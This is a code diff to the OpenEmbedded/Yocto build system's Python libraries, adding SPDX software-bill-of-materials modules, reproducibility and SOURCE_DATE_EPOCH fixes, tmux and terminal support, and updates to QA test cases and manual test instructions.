diff --git a/meta/lib/oe/qa.py b/meta/lib/oe/qa.py
index ea831b930a..e8a854a302 100644
--- a/meta/lib/oe/qa.py
+++ b/meta/lib/oe/qa.py
@@ -156,6 +156,7 @@ def elf_machine_to_string(machine):
"""
try:
return {
+ 0x00: "Unset",
0x02: "SPARC",
0x03: "x86",
0x08: "MIPS",
diff --git a/meta/lib/oe/recipeutils.py b/meta/lib/oe/recipeutils.py
index fde1ad3ddd..f36a2fb0ac 100644
--- a/meta/lib/oe/recipeutils.py
+++ b/meta/lib/oe/recipeutils.py
@@ -409,7 +409,7 @@ def copy_recipe_files(d, tgt_dir, whole_dir=False, download=True, all_variants=F
fetch.download()
for pth in fetch.localpaths():
if pth not in localpaths:
- localpaths.append(pth)
+ localpaths.append(os.path.abspath(pth))
uri_values.append(srcuri)
fetch_urls(d)
diff --git a/meta/lib/oe/reproducible.py b/meta/lib/oe/reproducible.py
index 421bb12f54..1ed79b18ca 100644
--- a/meta/lib/oe/reproducible.py
+++ b/meta/lib/oe/reproducible.py
@@ -41,13 +41,13 @@ def find_git_folder(d, sourcedir):
for root, dirs, files in os.walk(workdir, topdown=True):
dirs[:] = [d for d in dirs if d not in exclude]
if '.git' in dirs:
- return root
+ return os.path.join(root, ".git")
bb.warn("Failed to find a git repository in WORKDIR: %s" % workdir)
return None
def get_source_date_epoch_from_git(d, sourcedir):
- if not "git://" in d.getVar('SRC_URI'):
+ if not "git://" in d.getVar('SRC_URI') and not "gitsm://" in d.getVar('SRC_URI'):
return None
gitpath = find_git_folder(d, sourcedir)
@@ -62,7 +62,8 @@ def get_source_date_epoch_from_git(d, sourcedir):
return None
bb.debug(1, "git repository: %s" % gitpath)
- p = subprocess.run(['git', '--git-dir', gitpath, 'log', '-1', '--pretty=%ct'], check=True, stdout=subprocess.PIPE)
+ p = subprocess.run(['git', '-c', 'log.showSignature=false', '--git-dir', gitpath, 'log', '-1', '--pretty=%ct'],
+ check=True, stdout=subprocess.PIPE)
return int(p.stdout.decode('utf-8'))
def get_source_date_epoch_from_youngest_file(d, sourcedir):
@@ -90,8 +91,12 @@ def get_source_date_epoch_from_youngest_file(d, sourcedir):
bb.debug(1, "Newest file found: %s" % newest_file)
return source_date_epoch
-def fixed_source_date_epoch():
+def fixed_source_date_epoch(d):
bb.debug(1, "No tarball or git repo found to determine SOURCE_DATE_EPOCH")
+ source_date_epoch = d.getVar('SOURCE_DATE_EPOCH_FALLBACK')
+ if source_date_epoch:
+ bb.debug(1, "Using SOURCE_DATE_EPOCH_FALLBACK")
+ return int(source_date_epoch)
return 0
def get_source_date_epoch(d, sourcedir):
@@ -99,6 +104,6 @@ def get_source_date_epoch(d, sourcedir):
get_source_date_epoch_from_git(d, sourcedir) or
get_source_date_epoch_from_known_files(d, sourcedir) or
get_source_date_epoch_from_youngest_file(d, sourcedir) or
- fixed_source_date_epoch() # Last resort
+ fixed_source_date_epoch(d) # Last resort
)
diff --git a/meta/lib/oe/rootfs.py b/meta/lib/oe/rootfs.py
index cd65e62030..5391c25af9 100644
--- a/meta/lib/oe/rootfs.py
+++ b/meta/lib/oe/rootfs.py
@@ -167,7 +167,7 @@ class Rootfs(object, metaclass=ABCMeta):
pass
os.rename(self.image_rootfs, self.image_rootfs + '-dbg')
- bb.note(" Restoreing original rootfs...")
+ bb.note(" Restoring original rootfs...")
os.rename(self.image_rootfs + '-orig', self.image_rootfs)
def _exec_shell_cmd(self, cmd):
@@ -304,7 +304,7 @@ class Rootfs(object, metaclass=ABCMeta):
def _check_for_kernel_modules(self, modules_dir):
for root, dirs, files in os.walk(modules_dir, topdown=True):
for name in files:
- found_ko = name.endswith(".ko")
+ found_ko = name.endswith((".ko", ".ko.gz", ".ko.xz"))
if found_ko:
return found_ko
return False
@@ -321,7 +321,9 @@ class Rootfs(object, metaclass=ABCMeta):
if not os.path.exists(kernel_abi_ver_file):
bb.fatal("No kernel-abiversion file found (%s), cannot run depmod, aborting" % kernel_abi_ver_file)
- kernel_ver = open(kernel_abi_ver_file).read().strip(' \n')
+ with open(kernel_abi_ver_file) as f:
+ kernel_ver = f.read().strip(' \n')
+
versioned_modules_dir = os.path.join(self.image_rootfs, modules_dir, kernel_ver)
bb.utils.mkdirhier(versioned_modules_dir)
diff --git a/meta/lib/oe/sbom.py b/meta/lib/oe/sbom.py
new file mode 100644
index 0000000000..22ed5070ea
--- /dev/null
+++ b/meta/lib/oe/sbom.py
@@ -0,0 +1,84 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+import collections
+
+DepRecipe = collections.namedtuple("DepRecipe", ("doc", "doc_sha1", "recipe"))
+DepSource = collections.namedtuple("DepSource", ("doc", "doc_sha1", "recipe", "file"))
+
+
+def get_recipe_spdxid(d):
+ return "SPDXRef-%s-%s" % ("Recipe", d.getVar("PN"))
+
+
+def get_download_spdxid(d, idx):
+ return "SPDXRef-Download-%s-%d" % (d.getVar("PN"), idx)
+
+
+def get_package_spdxid(pkg):
+ return "SPDXRef-Package-%s" % pkg
+
+
+def get_source_file_spdxid(d, idx):
+ return "SPDXRef-SourceFile-%s-%d" % (d.getVar("PN"), idx)
+
+
+def get_packaged_file_spdxid(pkg, idx):
+ return "SPDXRef-PackagedFile-%s-%d" % (pkg, idx)
+
+
+def get_image_spdxid(img):
+ return "SPDXRef-Image-%s" % img
+
+
+def get_sdk_spdxid(sdk):
+ return "SPDXRef-SDK-%s" % sdk
+
+
+def write_doc(d, spdx_doc, subdir, spdx_deploy=None, indent=None):
+ from pathlib import Path
+
+ if spdx_deploy is None:
+ spdx_deploy = Path(d.getVar("SPDXDEPLOY"))
+
+ dest = spdx_deploy / subdir / (spdx_doc.name + ".spdx.json")
+ dest.parent.mkdir(exist_ok=True, parents=True)
+ with dest.open("wb") as f:
+ doc_sha1 = spdx_doc.to_json(f, sort_keys=True, indent=indent)
+
+ l = spdx_deploy / "by-namespace" / spdx_doc.documentNamespace.replace("/", "_")
+ l.parent.mkdir(exist_ok=True, parents=True)
+ l.symlink_to(os.path.relpath(dest, l.parent))
+
+ return doc_sha1
+
+
+def read_doc(fn):
+ import hashlib
+ import oe.spdx
+ import io
+ import contextlib
+
+ @contextlib.contextmanager
+ def get_file():
+ if isinstance(fn, io.IOBase):
+ yield fn
+ else:
+ with fn.open("rb") as f:
+ yield f
+
+ with get_file() as f:
+ sha1 = hashlib.sha1()
+ while True:
+ chunk = f.read(4096)
+ if not chunk:
+ break
+ sha1.update(chunk)
+
+ f.seek(0)
+ doc = oe.spdx.SPDXDocument.from_json(f)
+
+ return (doc, sha1.hexdigest())
diff --git a/meta/lib/oe/spdx.py b/meta/lib/oe/spdx.py
new file mode 100644
index 0000000000..7aaf2af5ed
--- /dev/null
+++ b/meta/lib/oe/spdx.py
@@ -0,0 +1,357 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+#
+# This library is intended to capture the JSON SPDX specification in a type
+# safe manner. It is not intended to encode any particular OE specific
+# behaviors, see the sbom.py for that.
+#
+# The documented SPDX spec document doesn't cover the JSON syntax for
+# particular configuration, which can make it hard to determine what the JSON
+# syntax should be. I've found it is actually much simpler to read the official
+# SPDX JSON schema which can be found here: https://github.com/spdx/spdx-spec
+# in schemas/spdx-schema.json
+#
+
+import hashlib
+import itertools
+import json
+
+SPDX_VERSION = "2.2"
+
+
+#
+# The following are the support classes that are used to implement SPDX object
+#
+
+class _Property(object):
+ """
+ A generic SPDX object property. The different types will derive from this
+ class
+ """
+
+ def __init__(self, *, default=None):
+ self.default = default
+
+ def setdefault(self, dest, name):
+ if self.default is not None:
+ dest.setdefault(name, self.default)
+
+
+class _String(_Property):
+ """
+ A scalar string property for an SPDX object
+ """
+
+ def __init__(self, **kwargs):
+ super().__init__(**kwargs)
+
+ def set_property(self, attrs, name):
+ def get_helper(obj):
+ return obj._spdx[name]
+
+ def set_helper(obj, value):
+ obj._spdx[name] = value
+
+ def del_helper(obj):
+ del obj._spdx[name]
+
+ attrs[name] = property(get_helper, set_helper, del_helper)
+
+ def init(self, source):
+ return source
+
+
+class _Object(_Property):
+ """
+ A scalar SPDX object property of a SPDX object
+ """
+
+ def __init__(self, cls, **kwargs):
+ super().__init__(**kwargs)
+ self.cls = cls
+
+ def set_property(self, attrs, name):
+ def get_helper(obj):
+ if not name in obj._spdx:
+ obj._spdx[name] = self.cls()
+ return obj._spdx[name]
+
+ def set_helper(obj, value):
+ obj._spdx[name] = value
+
+ def del_helper(obj):
+ del obj._spdx[name]
+
+ attrs[name] = property(get_helper, set_helper)
+
+ def init(self, source):
+ return self.cls(**source)
+
+
+class _ListProperty(_Property):
+ """
+ A list of SPDX properties
+ """
+
+ def __init__(self, prop, **kwargs):
+ super().__init__(**kwargs)
+ self.prop = prop
+
+ def set_property(self, attrs, name):
+ def get_helper(obj):
+ if not name in obj._spdx:
+ obj._spdx[name] = []
+ return obj._spdx[name]
+
+ def set_helper(obj, value):
+ obj._spdx[name] = list(value)
+
+ def del_helper(obj):
+ del obj._spdx[name]
+
+ attrs[name] = property(get_helper, set_helper, del_helper)
+
+ def init(self, source):
+ return [self.prop.init(o) for o in source]
+
+
+class _StringList(_ListProperty):
+ """
+ A list of strings as a property for an SPDX object
+ """
+
+ def __init__(self, **kwargs):
+ super().__init__(_String(), **kwargs)
+
+
+class _ObjectList(_ListProperty):
+ """
+ A list of SPDX objects as a property for an SPDX object
+ """
+
+ def __init__(self, cls, **kwargs):
+ super().__init__(_Object(cls), **kwargs)
+
+
+class MetaSPDXObject(type):
+ """
+ A metaclass that allows properties (anything derived from a _Property
+ class) to be defined for a SPDX object
+ """
+ def __new__(mcls, name, bases, attrs):
+ attrs["_properties"] = {}
+
+ for key in attrs.keys():
+ if isinstance(attrs[key], _Property):
+ prop = attrs[key]
+ attrs["_properties"][key] = prop
+ prop.set_property(attrs, key)
+
+ return super().__new__(mcls, name, bases, attrs)
+
+
+class SPDXObject(metaclass=MetaSPDXObject):
+ """
+ The base SPDX object; all SPDX spec classes must derive from this class
+ """
+ def __init__(self, **d):
+ self._spdx = {}
+
+ for name, prop in self._properties.items():
+ prop.setdefault(self._spdx, name)
+ if name in d:
+ self._spdx[name] = prop.init(d[name])
+
+ def serializer(self):
+ return self._spdx
+
+ def __setattr__(self, name, value):
+ if name in self._properties or name == "_spdx":
+ super().__setattr__(name, value)
+ return
+ raise KeyError("%r is not a valid SPDX property" % name)
+
+#
+# These are the SPDX objects implemented from the spec. The *only* properties
+# that can be added to these objects are ones directly specified in the SPDX
+# spec, however you may add helper functions to make operations easier.
+#
+# Defaults should *only* be specified if the SPDX spec says there is a certain
+# required value for a field (e.g. dataLicense), or if the field is mandatory
+# and has some sane "this field is unknown" (e.g. "NOASSERTION")
+#
+
+class SPDXAnnotation(SPDXObject):
+ annotationDate = _String()
+ annotationType = _String()
+ annotator = _String()
+ comment = _String()
+
+class SPDXChecksum(SPDXObject):
+ algorithm = _String()
+ checksumValue = _String()
+
+
+class SPDXRelationship(SPDXObject):
+ spdxElementId = _String()
+ relatedSpdxElement = _String()
+ relationshipType = _String()
+ comment = _String()
+ annotations = _ObjectList(SPDXAnnotation)
+
+
+class SPDXExternalReference(SPDXObject):
+ referenceCategory = _String()
+ referenceType = _String()
+ referenceLocator = _String()
+
+
+class SPDXPackageVerificationCode(SPDXObject):
+ packageVerificationCodeValue = _String()
+ packageVerificationCodeExcludedFiles = _StringList()
+
+
+class SPDXPackage(SPDXObject):
+ ALLOWED_CHECKSUMS = [
+ "SHA1",
+ "SHA224",
+ "SHA256",
+ "SHA384",
+ "SHA512",
+ "MD2",
+ "MD4",
+ "MD5",
+ "MD6",
+ ]
+
+ name = _String()
+ SPDXID = _String()
+ versionInfo = _String()
+ downloadLocation = _String(default="NOASSERTION")
+ supplier = _String(default="NOASSERTION")
+ homepage = _String()
+ licenseConcluded = _String(default="NOASSERTION")
+ licenseDeclared = _String(default="NOASSERTION")
+ summary = _String()
+ description = _String()
+ sourceInfo = _String()
+ copyrightText = _String(default="NOASSERTION")
+ licenseInfoFromFiles = _StringList(default=["NOASSERTION"])
+ externalRefs = _ObjectList(SPDXExternalReference)
+ packageVerificationCode = _Object(SPDXPackageVerificationCode)
+ hasFiles = _StringList()
+ packageFileName = _String()
+ annotations = _ObjectList(SPDXAnnotation)
+ checksums = _ObjectList(SPDXChecksum)
+
+
+class SPDXFile(SPDXObject):
+ SPDXID = _String()
+ fileName = _String()
+ licenseConcluded = _String(default="NOASSERTION")
+ copyrightText = _String(default="NOASSERTION")
+ licenseInfoInFiles = _StringList(default=["NOASSERTION"])
+ checksums = _ObjectList(SPDXChecksum)
+ fileTypes = _StringList()
+
+
+class SPDXCreationInfo(SPDXObject):
+ created = _String()
+ licenseListVersion = _String()
+ comment = _String()
+ creators = _StringList()
+
+
+class SPDXExternalDocumentRef(SPDXObject):
+ externalDocumentId = _String()
+ spdxDocument = _String()
+ checksum = _Object(SPDXChecksum)
+
+
+class SPDXExtractedLicensingInfo(SPDXObject):
+ name = _String()
+ comment = _String()
+ licenseId = _String()
+ extractedText = _String()
+
+
+class SPDXDocument(SPDXObject):
+ spdxVersion = _String(default="SPDX-" + SPDX_VERSION)
+ dataLicense = _String(default="CC0-1.0")
+ SPDXID = _String(default="SPDXRef-DOCUMENT")
+ name = _String()
+ documentNamespace = _String()
+ creationInfo = _Object(SPDXCreationInfo)
+ packages = _ObjectList(SPDXPackage)
+ files = _ObjectList(SPDXFile)
+ relationships = _ObjectList(SPDXRelationship)
+ externalDocumentRefs = _ObjectList(SPDXExternalDocumentRef)
+ hasExtractedLicensingInfos = _ObjectList(SPDXExtractedLicensingInfo)
+
+ def __init__(self, **d):
+ super().__init__(**d)
+
+ def to_json(self, f, *, sort_keys=False, indent=None, separators=None):
+ class Encoder(json.JSONEncoder):
+ def default(self, o):
+ if isinstance(o, SPDXObject):
+ return o.serializer()
+
+ return super().default(o)
+
+ sha1 = hashlib.sha1()
+ for chunk in Encoder(
+ sort_keys=sort_keys,
+ indent=indent,
+ separators=separators,
+ ).iterencode(self):
+ chunk = chunk.encode("utf-8")
+ f.write(chunk)
+ sha1.update(chunk)
+
+ return sha1.hexdigest()
+
+ @classmethod
+ def from_json(cls, f):
+ return cls(**json.load(f))
+
+ def add_relationship(self, _from, relationship, _to, *, comment=None, annotation=None):
+ if isinstance(_from, SPDXObject):
+ from_spdxid = _from.SPDXID
+ else:
+ from_spdxid = _from
+
+ if isinstance(_to, SPDXObject):
+ to_spdxid = _to.SPDXID
+ else:
+ to_spdxid = _to
+
+ r = SPDXRelationship(
+ spdxElementId=from_spdxid,
+ relatedSpdxElement=to_spdxid,
+ relationshipType=relationship,
+ )
+
+ if comment is not None:
+ r.comment = comment
+
+ if annotation is not None:
+ r.annotations.append(annotation)
+
+ self.relationships.append(r)
+
+ def find_by_spdxid(self, spdxid):
+ for o in itertools.chain(self.packages, self.files):
+ if o.SPDXID == spdxid:
+ return o
+ return None
+
+ def find_external_document_ref(self, namespace):
+ for r in self.externalDocumentRefs:
+ if r.spdxDocument == namespace:
+ return r
+ return None
diff --git a/meta/lib/oe/sstatesig.py b/meta/lib/oe/sstatesig.py
index d5a6200562..65bb4efe25 100644
--- a/meta/lib/oe/sstatesig.py
+++ b/meta/lib/oe/sstatesig.py
@@ -434,7 +434,7 @@ def find_sstate_manifest(taskdata, taskdata2, taskname, d, multilibcache):
d2 = multilibcache[variant]
if taskdata.endswith("-native"):
- pkgarchs = ["${BUILD_ARCH}"]
+ pkgarchs = ["${BUILD_ARCH}", "${BUILD_ARCH}_${ORIGNATIVELSBSTRING}"]
elif taskdata.startswith("nativesdk-"):
pkgarchs = ["${SDK_ARCH}_${SDK_OS}", "allarch"]
elif "-cross-canadian" in taskdata:
@@ -477,9 +477,13 @@ def OEOuthashBasic(path, sigfile, task, d):
h = hashlib.sha256()
prev_dir = os.getcwd()
include_owners = os.environ.get('PSEUDO_DISABLED') == '0'
+ if "package_write_" in task or task == "package_qa":
+ include_owners = False
include_timestamps = False
+ include_root = True
if task == "package":
include_timestamps = d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1'
+ include_root = False
extra_content = d.getVar('HASHEQUIV_HASH_VERSION')
try:
@@ -550,9 +554,11 @@ def OEOuthashBasic(path, sigfile, task, d):
try:
update_hash(" %10s" % pwd.getpwuid(s.st_uid).pw_name)
update_hash(" %10s" % grp.getgrgid(s.st_gid).gr_name)
- except KeyError:
+ except KeyError as e:
bb.warn("KeyError in %s" % path)
- raise
+ msg = ("KeyError: %s\nPath %s is owned by uid %d, gid %d, which doesn't match "
+ "any user/group on target. This may be due to host contamination." % (e, path, s.st_uid, s.st_gid))
+ raise Exception(msg).with_traceback(e.__traceback__)
if include_timestamps:
update_hash(" %10d" % s.st_mtime)
@@ -588,7 +594,8 @@ def OEOuthashBasic(path, sigfile, task, d):
update_hash("\n")
# Process this directory and all its child files
- process(root)
+ if include_root or root != ".":
+ process(root)
for f in files:
if f == 'fixmepath':
continue
diff --git a/meta/lib/oe/terminal.py b/meta/lib/oe/terminal.py
index eb10a6e33e..a0c166d884 100644
--- a/meta/lib/oe/terminal.py
+++ b/meta/lib/oe/terminal.py
@@ -102,6 +102,10 @@ class Rxvt(XTerminal):
command = 'rxvt -T "{title}" -e {command}'
priority = 1
+class URxvt(XTerminal):
+ command = 'urxvt -T "{title}" -e {command}'
+ priority = 1
+
class Screen(Terminal):
command = 'screen -D -m -t "{title}" -S devshell {command}'
@@ -163,7 +167,12 @@ class Tmux(Terminal):
# devshells, if it's already there, add a new window to it.
window_name = 'devshell-%i' % os.getpid()
- self.command = 'tmux new -c "{{cwd}}" -d -s {0} -n {0} "{{command}}"'.format(window_name)
+ self.command = 'tmux new -c "{{cwd}}" -d -s {0} -n {0} "{{command}}"'
+ if not check_tmux_version('1.9'):
+ # `tmux new-session -c` was added in 1.9;
+ # older versions fail with that flag
+ self.command = 'tmux new -d -s {0} -n {0} "{{command}}"'
+ self.command = self.command.format(window_name)
Terminal.__init__(self, sh_cmd, title, env, d)
attach_cmd = 'tmux att -t {0}'.format(window_name)
@@ -253,13 +262,18 @@ def spawn(name, sh_cmd, title=None, env=None, d=None):
except OSError:
return
+def check_tmux_version(desired):
+ vernum = check_terminal_version("tmux")
+ if vernum and LooseVersion(vernum) < desired:
+ return False
+ return vernum
+
def check_tmux_pane_size(tmux):
import subprocess as sub
# On older tmux versions (<1.9), return false. The reason
# is that there is no easy way to get the height of the active panel
# on current window without nested formats (available from version 1.9)
- vernum = check_terminal_version("tmux")
- if vernum and LooseVersion(vernum) < '1.9':
+ if not check_tmux_version('1.9'):
return False
try:
p = sub.Popen('%s list-panes -F "#{?pane_active,#{pane_height},}"' % tmux,
diff --git a/meta/lib/oe/utils.py b/meta/lib/oe/utils.py
index 13f4271da0..3e016244c5 100644
--- a/meta/lib/oe/utils.py
+++ b/meta/lib/oe/utils.py
@@ -193,7 +193,7 @@ def parallel_make(d, makeinst=False):
return int(v)
- return None
+ return ''
def parallel_make_argument(d, fmt, limit=None, makeinst=False):
"""
@@ -481,7 +481,8 @@ class ThreadedWorker(Thread):
try:
func(self, *args, **kargs)
except Exception as e:
- print(e)
+ # Eat all exceptions
+ bb.mainlogger.debug("Worker task raised %s" % e, exc_info=e)
finally:
self.tasks.task_done()
diff --git a/meta/lib/oeqa/core/case.py b/meta/lib/oeqa/core/case.py
index aae451fef2..bc4446a938 100644
--- a/meta/lib/oeqa/core/case.py
+++ b/meta/lib/oeqa/core/case.py
@@ -43,8 +43,13 @@ class OETestCase(unittest.TestCase):
clss.tearDownClassMethod()
def _oeSetUp(self):
- for d in self.decorators:
- d.setUpDecorator()
+ try:
+ for d in self.decorators:
+ d.setUpDecorator()
+ except:
+ for d in self.decorators:
+ d.tearDownDecorator()
+ raise
self.setUpMethod()
def _oeTearDown(self):
diff --git a/meta/lib/oeqa/core/decorator/oetimeout.py b/meta/lib/oeqa/core/decorator/oetimeout.py
index df90d1c798..5e6873ad48 100644
--- a/meta/lib/oeqa/core/decorator/oetimeout.py
+++ b/meta/lib/oeqa/core/decorator/oetimeout.py
@@ -24,5 +24,6 @@ class OETimeout(OETestDecorator):
def tearDownDecorator(self):
signal.alarm(0)
- signal.signal(signal.SIGALRM, self.alarmSignal)
- self.logger.debug("Removed SIGALRM handler")
+ if hasattr(self, 'alarmSignal'):
+ signal.signal(signal.SIGALRM, self.alarmSignal)
+ self.logger.debug("Removed SIGALRM handler")
diff --git a/meta/lib/oeqa/core/target/ssh.py b/meta/lib/oeqa/core/target/ssh.py
index aefb576805..832b6216f6 100644
--- a/meta/lib/oeqa/core/target/ssh.py
+++ b/meta/lib/oeqa/core/target/ssh.py
@@ -34,6 +34,7 @@ class OESSHTarget(OETarget):
self.timeout = timeout
self.user = user
ssh_options = [
+ '-o', 'HostKeyAlgorithms=+ssh-rsa',
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'-o', 'LogLevel=ERROR'
@@ -225,6 +226,9 @@ def SSHCall(command, logger, timeout=None, **opts):
endtime = time.time() + timeout
except InterruptedError:
continue
+ except BlockingIOError:
+ logger.debug('BlockingIOError')
+ continue
# process hasn't returned yet
if not eof:
diff --git a/meta/lib/oeqa/core/tests/cases/timeout.py b/meta/lib/oeqa/core/tests/cases/timeout.py
index 5dfecc7b7c..69cf969a67 100644
--- a/meta/lib/oeqa/core/tests/cases/timeout.py
+++ b/meta/lib/oeqa/core/tests/cases/timeout.py
@@ -8,6 +8,7 @@ from time import sleep
from oeqa.core.case import OETestCase
from oeqa.core.decorator.oetimeout import OETimeout
+from oeqa.core.decorator.depends import OETestDepends
class TimeoutTest(OETestCase):
@@ -19,3 +20,15 @@ class TimeoutTest(OETestCase):
def testTimeoutFail(self):
sleep(2)
self.assertTrue(True, msg='How is this possible?')
+
+
+ def testTimeoutSkip(self):
+ self.skipTest("This test needs to be skipped, so that testTimeoutDepends()'s OETestDepends kicks in")
+
+ @OETestDepends(["timeout.TimeoutTest.testTimeoutSkip"])
+ @OETimeout(3)
+ def testTimeoutDepends(self):
+ self.assertTrue(False, msg='How is this possible?')
+
+ def testTimeoutUnrelated(self):
+ sleep(6)
diff --git a/meta/lib/oeqa/core/tests/test_decorators.py b/meta/lib/oeqa/core/tests/test_decorators.py
index b798bf7d33..5095f39948 100755
--- a/meta/lib/oeqa/core/tests/test_decorators.py
+++ b/meta/lib/oeqa/core/tests/test_decorators.py
@@ -133,5 +133,11 @@ class TestTimeoutDecorator(TestBase):
msg = "OETestTimeout didn't restore SIGALRM"
self.assertIs(alarm_signal, signal.getsignal(signal.SIGALRM), msg=msg)
+ def test_timeout_cancel(self):
+ tests = ['timeout.TimeoutTest.testTimeoutSkip', 'timeout.TimeoutTest.testTimeoutDepends', 'timeout.TimeoutTest.testTimeoutUnrelated']
+ msg = 'Unrelated test failed to complete'
+ tc = self._testLoader(modules=self.modules, tests=tests)
+ self.assertTrue(tc.runTests().wasSuccessful(), msg=msg)
+
if __name__ == '__main__':
unittest.main()
diff --git a/meta/lib/oeqa/manual/eclipse-plugin.json b/meta/lib/oeqa/manual/eclipse-plugin.json
index d77d0e673b..6c110d0656 100644
--- a/meta/lib/oeqa/manual/eclipse-plugin.json
+++ b/meta/lib/oeqa/manual/eclipse-plugin.json
@@ -44,7 +44,7 @@
"expected_results": ""
},
"2": {
- "action": "wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/qemu (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n",
+ "action": "wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/ (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n",
"expected_results": " Qemu can be lauched normally."
},
"3": {
@@ -60,7 +60,7 @@
"expected_results": ""
},
"6": {
- "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n",
+ "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n",
"expected_results": ""
},
"7": {
@@ -247,7 +247,7 @@
"execution": {
"1": {
"action": "Clone eclipse-poky source. \n \n - git clone git://git.yoctoproject.org/eclipse-poky \n\n",
- "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on http://autobuilder.yoctoproject.org/pub/releases/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n"
+ "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on https://downloads.yoctoproject.org/releases/yocto/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n"
},
"2": {
"action": "Checkout correct tag. \n\n - git checkout <eclipse-version>/<yocto-version> \n\n",
diff --git a/meta/lib/oeqa/manual/oe-core.json b/meta/lib/oeqa/manual/oe-core.json
index fb47c5ec36..4ad524d89b 100644
--- a/meta/lib/oeqa/manual/oe-core.json
+++ b/meta/lib/oeqa/manual/oe-core.json
@@ -80,7 +80,7 @@
"expected_results": ""
},
"7": {
- "action": "Run command:./configure && make ",
+ "action": "Run command:./configure ${CONFIGUREOPTS} && make ",
"expected_results": "Verify that \"matchbox-desktop\" binary file was created successfully under \"src/\" directory "
},
"8": {
diff --git a/meta/lib/oeqa/manual/toaster-managed-mode.json b/meta/lib/oeqa/manual/toaster-managed-mode.json
index 12374c7c64..9566d9d10e 100644
--- a/meta/lib/oeqa/manual/toaster-managed-mode.json
+++ b/meta/lib/oeqa/manual/toaster-managed-mode.json
@@ -136,7 +136,7 @@
"expected_results": ""
},
"3": {
- "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASES - package_rpm \n SSTATE_DIR - /homeDirectory/poky/sstate-cache \n\n",
+ "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASSES - package_rpm \n SSTATE_DIR - /homeDirectory/poky/sstate-cache \n\n",
"expected_results": ""
},
"4": {
diff --git a/meta/lib/oeqa/runtime/cases/date.py b/meta/lib/oeqa/runtime/cases/date.py
index fdd2a6ae58..bd6537400e 100644
--- a/meta/lib/oeqa/runtime/cases/date.py
+++ b/meta/lib/oeqa/runtime/cases/date.py
@@ -13,12 +13,12 @@ class DateTest(OERuntimeTestCase):
def setUp(self):
if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
self.logger.debug('Stopping systemd-timesyncd daemon')
- self.target.run('systemctl disable --now systemd-timesyncd')
+ self.target.run('systemctl disable --now --runtime systemd-timesyncd')
def tearDown(self):
if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
self.logger.debug('Starting systemd-timesyncd daemon')
- self.target.run('systemctl enable --now systemd-timesyncd')
+ self.target.run('systemctl enable --now --runtime systemd-timesyncd')
@OETestDepends(['ssh.SSHTest.test_ssh'])
@OEHasPackage(['coreutils', 'busybox'])
@@ -28,14 +28,13 @@ class DateTest(OERuntimeTestCase):
self.assertEqual(status, 0, msg=msg)
oldDate = output
- sampleDate = '"2016-08-09 10:00:00"'
- (status, output) = self.target.run("date -s %s" % sampleDate)
+ sampleTimestamp = 1488800000
+ (status, output) = self.target.run("date -s @%d" % sampleTimestamp)
self.assertEqual(status, 0, msg='Date set failed, output: %s' % output)
- (status, output) = self.target.run("date -R")
- p = re.match('Tue, 09 Aug 2016 10:00:.. \+0000', output)
+ (status, output) = self.target.run('date +"%s"')
msg = 'The date was not set correctly, output: %s' % output
- self.assertTrue(p, msg=msg)
+ self.assertTrue(int(output) - sampleTimestamp < 300, msg=msg)
(status, output) = self.target.run('date -s "%s"' % oldDate)
msg = 'Failed to reset date, output: %s' % output
diff --git a/meta/lib/oeqa/runtime/cases/df.py b/meta/lib/oeqa/runtime/cases/df.py
index 89fd0fb901..bb155c9cf9 100644
--- a/meta/lib/oeqa/runtime/cases/df.py
+++ b/meta/lib/oeqa/runtime/cases/df.py
@@ -4,12 +4,14 @@
from oeqa.runtime.case import OERuntimeTestCase
from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfDataVar, skipIfInDataVar
from oeqa.runtime.decorator.package import OEHasPackage
class DfTest(OERuntimeTestCase):
@OETestDepends(['ssh.SSHTest.test_ssh'])
@OEHasPackage(['coreutils', 'busybox'])
+ @skipIfInDataVar('IMAGE_FEATURES', 'read-only-rootfs', 'Test case df requires a writable rootfs')
def test_df(self):
cmd = "df -P / | sed -n '2p' | awk '{print $4}'"
(status,output) = self.target.run(cmd)
